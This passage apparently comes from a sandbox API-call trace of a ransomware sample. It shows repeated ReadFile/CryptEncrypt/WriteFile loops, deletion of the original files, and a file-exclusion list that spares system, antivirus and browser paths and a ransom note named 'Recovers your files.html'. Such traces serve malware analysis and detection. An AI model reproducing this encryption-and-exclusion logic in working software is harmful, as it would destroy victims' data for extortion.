returned 1 [0144.814] GetLastError () returned 0x0 [0144.814] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.814] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.814] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.814] GetLastError () returned 0x0 [0144.814] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.814] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.814] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.814] GetLastError () returned 0x0 [0144.814] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.814] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.814] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.814] GetLastError () returned 0x0 [0144.814] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.815] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.815] GetLastError () returned 0x0 [0144.815] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.815] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.815] GetLastError () returned 0x0 [0144.815] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.815] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.815] GetLastError () returned 0x0 [0144.815] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.815] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.815] GetLastError () returned 0x0 [0144.815] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.815] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.815] GetLastError () returned 0x0 [0144.815] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.815] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.815] GetLastError () returned 0x0 [0144.815] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.815] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.816] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.816] GetLastError () returned 0x0 [0144.816] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.816] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.816] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.816] GetLastError () returned 0x0 [0144.816] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.816] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.816] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.816] GetLastError () returned 0x0 [0144.816] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.816] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.816] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.816] GetLastError () returned 0x0 [0144.816] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.816] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.816] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.816] GetLastError () returned 0x0 [0144.816] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.816] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.816] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.816] GetLastError () returned 0x0 [0144.816] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.816] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.817] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.817] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.817] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.817] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.817] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.817] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.817] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.817] GetLastError () returned 0x0 [0144.817] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.818] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.818] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.818] GetLastError () returned 0x0 [0144.818] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.891] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 1 [0144.892] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat")) returned 0 [0144.892] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" [0144.892] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0144.892] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA8CE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa8ce.tmp")) returned 0xa8ce [0144.892] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA8CE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa8ce.tmp"), dwFlags=0x1) returned 0 [0144.892] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA8CE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa8ce.tmp")) returned 1 [0144.894] CryptDestroyKey (hKey=0x9ad438) returned 1 [0144.894] wcslen (_String="OK") returned 0x2 [0144.894] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.894] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.894] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0144.894] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0144.894] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0144.894] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.894] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*NMCRYPT") returned 0 [0144.894] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*Recovers your files.html") returned 0 [0144.894] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.exe") returned 0 [0144.894] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.dll") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.lnk") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.bat") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.ini") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.msi") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*.scf") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*pagefile.sys*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*NTUSER.DAT*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*AppData*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\winrar\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\Internet Explorer\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\java\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\TeamViewer\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\windows\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\ESET\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\AVG\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\AVIRA\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*\\AVAST Software\\*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*Atheros*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*Realtek*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*bootmgr*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*boot*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*boot*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*CONFIG.SYS*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*IO.SYS*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*MSDOS.SYS*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*NTDETECT.COM*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*ntldr*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*chrome*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*opera*") returned 0 [0144.895] PathMatchSpecW (pszFile="hwrusalm.dat", pszSpec="*firefox*") returned 0 [0144.895] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat", pszSpec="*") returned 1 [0144.895] strlen (_Str="NMoreira") returned 0x8 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 